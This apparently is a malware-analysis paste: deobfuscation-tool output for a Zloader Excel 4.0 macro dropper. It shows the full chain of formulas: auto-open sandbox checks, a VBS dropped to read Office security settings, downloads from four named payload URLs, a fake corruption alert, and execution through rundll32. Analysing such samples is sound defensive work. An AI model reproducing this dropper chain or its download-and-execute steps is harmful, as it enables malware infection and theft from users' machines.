dissectmalware

Zloader (7dd5eabb0946fd1d11a77ad82143afe2) deobfuscated XLM

Jun 22nd, 2020
  1. xlmdeobfuscator -f C:\Users\user\Downloads\order.50785.xls\order.50785.xls
  2.  
  3. _ _______
  4. |\ /|( \ ( )
  5. ( \ / )| ( | () () |
  6. \ (_) / | | | || || |
  7. ) _ ( | | | |(_)| |
  8. / ( ) \ | | | | | |
  9. ( / \ )| (____/\| ) ( |
  10. |/ \|(_______/|/ \|
  11. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  12. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  13. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  14. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  15. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  16. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  17. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  18. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  19.  
  20.  
  21. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  22.  
  23. File: C:\Users\user\Downloads\order.50785.xls\order.50785.xls
  24.  
  25. Unencrypted xls file
  26.  
  27. [Loading Cells]
  28. auto_open: auto_open->'rtNGOD1P843zMOPdOj'!$CO$18233
  29. [Starting Deobfuscation]
  30. CELL:CO18233 , FullEvaluation , FORMULA("=CHAR(R[55791]C[-212])",rtNGOD1P843zMOPdOj$HW$7579:$HW$7659)
  31. CELL:CO18234 , FullEvaluation , ON.TIME(2020-06-22 11:29:16.856277,'rtNGOD1P843zMOPdOj'!DO18935)
  32. CELL:DO18935 , FullEvaluation , "=CLOSE(FALSE)"
  33. CELL:DO18936 , FullEvaluation , "=APP.MAXIMIZE()"
  34. CELL:DO18937 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R20022C180),)"
  35. CELL:DO18938 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R20022C180))"
  36. CELL:DO18939 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R20022C180),)"
  37. CELL:DO18940 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R20022C180),)"
  38. CELL:DO18941 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)"
  39. CELL:DO18942 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)"
  40. CELL:DO18943 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R20022C180))"
  41. CELL:DO18944 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R20022C180))"
  42. CELL:DO18945 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R20022C180))"
  43. CELL:DO18946 , FullEvaluation , "=""C:\Users\Public\Oyi.vbs"""
  44. CELL:DO18947 , FullEvaluation , "=""C:\Users\Public\a8FML.txt"""
  45. CELL:DO18948 , FullEvaluation , "=FOPEN(R20033C180,3)"
  46. CELL:DO18949 , FullEvaluation , "=FWRITELN(R20035C180,""On Error Resume Next"")"
  47. CELL:DO18950 , FullEvaluation , "=FWRITELN(R20035C180,""Set fqaeA = CreateObject(""""WScript.Shell"""")"")"
  48. CELL:DO18951 , FullEvaluation , "=FWRITELN(R20035C180,""Set YtU9AS = CreateObject(""""Scripting.FileSystemObject"""")"")"
  49. CELL:DO18952 , FullEvaluation , "=FWRITELN(R20035C180,""Set pZ93bgn = YtU9AS.CreateTextFile(""""""&R20034C180&"""""", True)"")"
  50. CELL:DO18953 , FullEvaluation , "=FWRITELN(R20035C180,""pZ93bgn.WriteLine(fqaeA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  51. CELL:DO18954 , FullEvaluation , "=FWRITELN(R20035C180,""pZ93bgn.Close"")"
  52. CELL:DO18955 , FullEvaluation , "=FCLOSE(R20035C180)"
  53. CELL:DO18956 , FullEvaluation , "=EXEC(""explorer.exe ""&R20033C180&"""")"
  54. CELL:DO18957 , FullEvaluation , "=WHILE(ISERROR(FILES(R20034C180)))"
  55. CELL:DO18958 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  56. CELL:DO18959 , FullEvaluation , "=NEXT()"
  57. CELL:DO18960 , FullEvaluation , "=FILE.DELETE(R20033C180)"
  58. CELL:DO18961 , FullEvaluation , "=FOPEN(R20034C180,2)"
  59. CELL:DO18962 , FullEvaluation , "=FREAD(R20048C180,100)"
  60. CELL:DO18963 , FullEvaluation , "=FCLOSE(R20048C180)"
  61. CELL:DO18964 , FullEvaluation , "=FILE.DELETE(R20034C180)"
  62. CELL:DO18965 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R20049C180)),GOTO(R20022C180),)"
  63. CELL:DO18966 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))"
  64. CELL:DO18967 , FullEvaluation , ON.TIME(2020-06-22 11:29:17.058154,'rtNGOD1P843zMOPdOj'!M24795)
  65. CELL:M24795 , FullEvaluation , FORMULA("=FORMULA(R[-5861]C[106],R[-4774]C[167])",rtNGOD1P843zMOPdOj$M$24796:$M$24827)
  66. CELL:M24796 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-4774]C[167])
  67. CELL:M24797 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-4774]C[167])
  68. CELL:M24798 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R20022C180),)",R[-4774]C[167])
  69. CELL:M24799 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R20022C180))",R[-4774]C[167])
  70. CELL:M24800 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R20022C180),)",R[-4774]C[167])
  71. CELL:M24801 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R20022C180),)",R[-4774]C[167])
  72. CELL:M24802 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)",R[-4774]C[167])
  73. CELL:M24803 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)",R[-4774]C[167])
  74. CELL:M24804 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R20022C180))",R[-4774]C[167])
  75. CELL:M24805 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R20022C180))",R[-4774]C[167])
  76. CELL:M24806 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R20022C180))",R[-4774]C[167])
  77. CELL:M24807 , FullEvaluation , FORMULA("=""C:\Users\Public\Oyi.vbs""",R[-4774]C[167])
  78. CELL:M24808 , FullEvaluation , FORMULA("=""C:\Users\Public\a8FML.txt""",R[-4774]C[167])
  79. CELL:M24809 , FullEvaluation , FORMULA("=FOPEN(R20033C180,3)",R[-4774]C[167])
  80. CELL:M24810 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""On Error Resume Next"")",R[-4774]C[167])
  81. CELL:M24811 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set fqaeA = CreateObject(""""WScript.Shell"""")"")",R[-4774]C[167])
  82. CELL:M24812 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set YtU9AS = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-4774]C[167])
  83. CELL:M24813 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""Set pZ93bgn = YtU9AS.CreateTextFile(""""""&R20034C180&"""""", True)"")",R[-4774]C[167])
  84. CELL:M24814 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""pZ93bgn.WriteLine(fqaeA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-4774]C[167])
  85. CELL:M24815 , FullEvaluation , FORMULA("=FWRITELN(R20035C180,""pZ93bgn.Close"")",R[-4774]C[167])
  86. CELL:M24816 , FullEvaluation , FORMULA("=FCLOSE(R20035C180)",R[-4774]C[167])
  87. CELL:M24817 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R20033C180&"""")",R[-4774]C[167])
  88. CELL:M24818 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R20034C180)))",R[-4774]C[167])
  89. CELL:M24819 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-4774]C[167])
  90. CELL:M24820 , FullEvaluation , FORMULA("=NEXT()",R[-4774]C[167])
  91. CELL:M24821 , FullEvaluation , FORMULA("=FILE.DELETE(R20033C180)",R[-4774]C[167])
  92. CELL:M24822 , FullEvaluation , FORMULA("=FOPEN(R20034C180,2)",R[-4774]C[167])
  93. CELL:M24823 , FullEvaluation , FORMULA("=FREAD(R20048C180,100)",R[-4774]C[167])
  94. CELL:M24824 , FullEvaluation , FORMULA("=FCLOSE(R20048C180)",R[-4774]C[167])
  95. CELL:M24825 , FullEvaluation , FORMULA("=FILE.DELETE(R20034C180)",R[-4774]C[167])
  96. CELL:M24826 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R20049C180)),GOTO(R20022C180),)",R[-4774]C[167])
  97. CELL:M24827 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))",R[-4774]C[167])
  98. CELL:M24828 , FullEvaluation , ON.TIME(2020-06-22 11:29:17.077142,'rtNGOD1P843zMOPdOj'!FX20023)
  99. CELL:FX20023 , PartialEvaluation , APP.MAXIMIZE()
  100. CELL:FX20024 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R20022C180),)
  101. CELL:FX20025 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R20022C180))
  102. CELL:FX20026 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R20022C180),)
  103. CELL:FX20027 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R20022C180),)
  104. CELL:FX20028 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R20022C180),)
  105. CELL:FX20029 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R20022C180),)
  106. CELL:FX20030 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R20022C180))
  107. CELL:FX20031 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R20022C180))
  108. CELL:FX20032 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R20022C180))
  109. CELL:FX20032 , FullEvaluation , [TRUE]
  110. CELL:FX20033 , FullEvaluation , "C:\Users\Public\Oyi.vbs"
  111. CELL:FX20034 , FullEvaluation , "C:\Users\Public\a8FML.txt"
  112. CELL:FX20035 , FullEvaluation , FOPEN("C:\Users\Public\Oyi.vbs",3)
  113. CELL:FX20036 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","On Error Resume Next")
  114. CELL:FX20037 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set fqaeA = CreateObject(""WScript.Shell"")")
  115. CELL:FX20038 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set YtU9AS = CreateObject(""Scripting.FileSystemObject"")")
  116. CELL:FX20039 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","Set pZ93bgn = YtU9AS.CreateTextFile(""C:\Users\Public\a8FML.txt"", True)")
  117. CELL:FX20040 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","pZ93bgn.WriteLine(fqaeA.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  118. CELL:FX20041 , FullEvaluation , FWRITE("C:\Users\Public\Oyi.vbs","pZ93bgn.Close")
  119. CELL:FX20042 , PartialEvaluation , FCLOSE("C:\Users\Public\Oyi.vbs")
  120. CELL:FX20043 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\Oyi.vbs")
  121. CELL:FX20044 , PartialEvaluation , WHILE(ISERROR(FILES(R20034C180)))
  122. CELL:FX20047 , PartialEvaluation , FILE.DELETE("C:\Users\Public\Oyi.vbs")
  123. CELL:FX20048 , FullEvaluation , FOPEN("C:\Users\Public\a8FML.txt",2)
  124. CELL:FX20049 , PartialEvaluation , FREAD("C:\Users\Public\a8FML.txt",100)
  125. CELL:FX20050 , PartialEvaluation , FCLOSE("C:\Users\Public\a8FML.txt")
  126. CELL:FX20051 , PartialEvaluation , FILE.DELETE("C:\Users\Public\a8FML.txt")
  127. CELL:FX20052 , FullBranching , IF(ISNUMBER(SEARCH("1",R20049C180)),GOTO(R20022C180),)
  128. CELL:FX20052 , FullEvaluation , [TRUE] GOTO(R20022C180)
  129. CELL:FX20022 , End , CLOSE(FALSE)
  130. CELL:FX20052 , FullEvaluation , [FALSE]
  131. CELL:FX20053 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R37937C135),GOTO(R47050C49))
  132. CELL:FX20053 , FullEvaluation , [TRUE] GOTO(R37937C135)
  133. CELL:EE37937 , FullEvaluation , "=""C:\Users\Public\aB3WzTL.html"""
  134. CELL:EE37938 , FullEvaluation , "=""https://thepsaokhue.com/wp-keys.php"""
  135. CELL:EE37939 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13914C238,R13913C238,0,0)"
  136. CELL:EE37940 , FullEvaluation , "=FILES(R13913C238)"
  137. CELL:EE37941 , FullEvaluation , "=IF(ISERROR(R13916C238),GOTO(R13923C238),)"
  138. CELL:EE37942 , FullEvaluation , "=FOPEN(R13913C238)"
  139. CELL:EE37943 , FullEvaluation , "=FSIZE(R13918C238)"
  140. CELL:EE37944 , FullEvaluation , "=FCLOSE(R13918C238)"
  141. CELL:EE37945 , FullEvaluation , "=IF(R13919C238<40000,,GOTO(R13940C238))"
  142. CELL:EE37946 , FullEvaluation , "=""https://metagro.com.br/wp-keys.php"""
  143. CELL:EE37947 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13922C238,R13913C238,0,0)"
  144. CELL:EE37948 , FullEvaluation , "=FILES(R13913C238)"
  145. CELL:EE37949 , FullEvaluation , "=IF(ISERROR(R13924C238),GOTO(R13931C238),)"
  146. CELL:EE37950 , FullEvaluation , "=FOPEN(R13913C238)"
  147. CELL:EE37951 , FullEvaluation , "=FSIZE(R13926C238)"
  148. CELL:EE37952 , FullEvaluation , "=FCLOSE(R13926C238)"
  149. CELL:EE37953 , FullEvaluation , "=IF(R13927C238<40000,,GOTO(R13940C238))"
  150. CELL:EE37954 , FullEvaluation , "=""https://loughturnperceidrin.ml/wp-keys.php"""
  151. CELL:EE37955 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13930C238,R13913C238,0,0)"
  152. CELL:EE37956 , FullEvaluation , "=FILES(R13913C238)"
  153. CELL:EE37957 , FullEvaluation , "=IF(ISERROR(R13932C238),GOTO(R13939C238),)"
  154. CELL:EE37958 , FullEvaluation , "=FOPEN(R13913C238)"
  155. CELL:EE37959 , FullEvaluation , "=FSIZE(R13934C238)"
  156. CELL:EE37960 , FullEvaluation , "=FCLOSE(R13934C238)"
  157. CELL:EE37961 , FullEvaluation , "=IF(R13935C238<40000,,GOTO(R13940C238))"
  158. CELL:EE37962 , FullEvaluation , "=""https://joliroomlides.tk/wp-keys.php"""
  159. CELL:EE37963 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13938C238,R13913C238,0,0)"
  160. CELL:EE37964 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  161. CELL:EE37965 , FullEvaluation , "=ALERT(R13940C238)"
  162. CELL:EE37966 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  163. CELL:EE37967 , FullEvaluation , "=R13913C238&"",DllRegisterServer"""
  164. CELL:EE37968 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R13942C238,R13943C238,0,5)"
  165. CELL:EE37969 , FullEvaluation , "=GOTO(R20022C180)"
  166. CELL:EE37970 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.115500,'rtNGOD1P843zMOPdOj'!D4644)
  167. CELL:D4644 , FullEvaluation , FORMULA("=FORMULA(R[33292]C[131],R[9268]C[234])",rtNGOD1P843zMOPdOj$D$4645:$D$4677)
  168. CELL:D4645 , FullEvaluation , FORMULA("=""C:\Users\Public\aB3WzTL.html""",R[9268]C[234])
  169. CELL:D4646 , FullEvaluation , FORMULA("=""https://thepsaokhue.com/wp-keys.php""",R[9268]C[234])
  170. CELL:D4647 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13914C238,R13913C238,0,0)",R[9268]C[234])
  171. CELL:D4648 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
  172. CELL:D4649 , FullEvaluation , FORMULA("=IF(ISERROR(R13916C238),GOTO(R13923C238),)",R[9268]C[234])
  173. CELL:D4650 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
  174. CELL:D4651 , FullEvaluation , FORMULA("=FSIZE(R13918C238)",R[9268]C[234])
  175. CELL:D4652 , FullEvaluation , FORMULA("=FCLOSE(R13918C238)",R[9268]C[234])
  176. CELL:D4653 , FullEvaluation , FORMULA("=IF(R13919C238<40000,,GOTO(R13940C238))",R[9268]C[234])
  177. CELL:D4654 , FullEvaluation , FORMULA("=""https://metagro.com.br/wp-keys.php""",R[9268]C[234])
  178. CELL:D4655 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13922C238,R13913C238,0,0)",R[9268]C[234])
  179. CELL:D4656 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
  180. CELL:D4657 , FullEvaluation , FORMULA("=IF(ISERROR(R13924C238),GOTO(R13931C238),)",R[9268]C[234])
  181. CELL:D4658 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
  182. CELL:D4659 , FullEvaluation , FORMULA("=FSIZE(R13926C238)",R[9268]C[234])
  183. CELL:D4660 , FullEvaluation , FORMULA("=FCLOSE(R13926C238)",R[9268]C[234])
  184. CELL:D4661 , FullEvaluation , FORMULA("=IF(R13927C238<40000,,GOTO(R13940C238))",R[9268]C[234])
  185. CELL:D4662 , FullEvaluation , FORMULA("=""https://loughturnperceidrin.ml/wp-keys.php""",R[9268]C[234])
  186. CELL:D4663 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13930C238,R13913C238,0,0)",R[9268]C[234])
  187. CELL:D4664 , FullEvaluation , FORMULA("=FILES(R13913C238)",R[9268]C[234])
  188. CELL:D4665 , FullEvaluation , FORMULA("=IF(ISERROR(R13932C238),GOTO(R13939C238),)",R[9268]C[234])
  189. CELL:D4666 , FullEvaluation , FORMULA("=FOPEN(R13913C238)",R[9268]C[234])
  190. CELL:D4667 , FullEvaluation , FORMULA("=FSIZE(R13934C238)",R[9268]C[234])
  191. CELL:D4668 , FullEvaluation , FORMULA("=FCLOSE(R13934C238)",R[9268]C[234])
  192. CELL:D4669 , FullEvaluation , FORMULA("=IF(R13935C238<40000,,GOTO(R13940C238))",R[9268]C[234])
  193. CELL:D4670 , FullEvaluation , FORMULA("=""https://joliroomlides.tk/wp-keys.php""",R[9268]C[234])
  194. CELL:D4671 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R13938C238,R13913C238,0,0)",R[9268]C[234])
  195. CELL:D4672 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[9268]C[234])
  196. CELL:D4673 , FullEvaluation , FORMULA("=ALERT(R13940C238)",R[9268]C[234])
  197. CELL:D4674 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[9268]C[234])
  198. CELL:D4675 , FullEvaluation , FORMULA("=R13913C238&"",DllRegisterServer""",R[9268]C[234])
  199. CELL:D4676 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R13942C238,R13943C238,0,5)",R[9268]C[234])
  200. CELL:D4677 , FullEvaluation , FORMULA("=GOTO(R20022C180)",R[9268]C[234])
  201. CELL:D4678 , FullEvaluation , ON.TIME(2020-06-22 11:29:18.126493,'rtNGOD1P843zMOPdOj'!ID13913)
  202. CELL:ID13913 , FullEvaluation , "C:\Users\Public\aB3WzTL.html"
  203. CELL:ID13914 , FullEvaluation , "https://thepsaokhue.com/wp-keys.php"
  204. CELL:ID13915 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://thepsaokhue.com/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  205. CELL:ID13916 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  206. CELL:ID13917 , FullBranching , IF(ISERROR(R13916C238),GOTO(R13923C238),)
  207. CELL:ID13917 , FullEvaluation , [TRUE] GOTO(R13923C238)
  208. CELL:ID13923 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://metagro.com.br/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  209. CELL:ID13924 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  210. CELL:ID13925 , FullBranching , IF(ISERROR(R13924C238),GOTO(R13931C238),)
  211. CELL:ID13925 , FullEvaluation , [TRUE] GOTO(R13931C238)
  212. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  213. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  214. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  215. CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
  216. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  217. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  218. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  219. CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  220. CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
  221. CELL:ID13944 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\aB3WzTL.html,DllRegisterServer",0,5)
  222. CELL:ID13945 , FullEvaluation , GOTO(R20022C180)
  223. CELL:FX20022 , End , CLOSE(FALSE)
  224. CELL:ID13933 , FullEvaluation , [FALSE]
  225. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  226. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  227. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  228. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
  229. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
  230. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  231. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  232. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  233. CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  234. CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
  235. CELL:ID13944 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\aB3WzTL.html,DllRegisterServer",0,5)
  236. CELL:ID13945 , FullEvaluation , GOTO(R20022C180)
  237. CELL:FX20022 , End , CLOSE(FALSE)
  238. CELL:ID13925 , FullEvaluation , [FALSE]
  239. CELL:ID13926 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  240. CELL:ID13927 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  241. CELL:ID13928 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  242. CELL:ID13929 , FullEvaluation , IF(R13927C238<40000,,GOTO(R13940C238))
  243. CELL:ID13930 , FullEvaluation , "https://loughturnperceidrin.ml/wp-keys.php"
  244. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  245. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  246. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  247. CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
  248. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  249. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  250. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  251. CELL:ID13942 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  252. CELL:ID13943 , FullEvaluation , "C:\Users\Public\aB3WzTL.html,DllRegisterServer"
  253. CELL:ID13933 , FullEvaluation , [FALSE]
  254. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  255. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  256. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  257. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
  258. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
  259. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  260. CELL:ID13940 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  261. CELL:ID13941 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  262. CELL:ID13917 , FullEvaluation , [FALSE]
  263. CELL:ID13918 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  264. CELL:ID13919 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  265. CELL:ID13920 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  266. CELL:ID13921 , FullEvaluation , IF(R13919C238<40000,,GOTO(R13940C238))
  267. CELL:ID13922 , FullEvaluation , "https://metagro.com.br/wp-keys.php"
  268. CELL:ID13923 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://metagro.com.br/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  269. CELL:ID13924 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  270. CELL:ID13925 , FullBranching , IF(ISERROR(R13924C238),GOTO(R13931C238),)
  271. CELL:ID13925 , FullEvaluation , [TRUE] GOTO(R13931C238)
  272. CELL:ID13931 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://loughturnperceidrin.ml/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  273. CELL:ID13932 , PartialEvaluation , FILES("C:\Users\Public\aB3WzTL.html")
  274. CELL:ID13933 , FullBranching , IF(ISERROR(R13932C238),GOTO(R13939C238),)
  275. CELL:ID13933 , FullEvaluation , [TRUE] GOTO(R13939C238)
  276. CELL:ID13939 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://joliroomlides.tk/wp-keys.php","C:\Users\Public\aB3WzTL.html",0,0)
  277. CELL:ID13933 , FullEvaluation , [FALSE]
  278. CELL:ID13934 , FullEvaluation , FOPEN("C:\Users\Public\aB3WzTL.html",1)
  279. CELL:ID13935 , PartialEvaluation , FSIZE("C:\Users\Public\aB3WzTL.html")
  280. CELL:ID13936 , PartialEvaluation , FCLOSE("C:\Users\Public\aB3WzTL.html")
  281. CELL:ID13937 , FullEvaluation , IF(R13935C238<40000,,GOTO(R13940C238))
  282. CELL:ID13938 , FullEvaluation , "https://joliroomlides.tk/wp-keys.php"
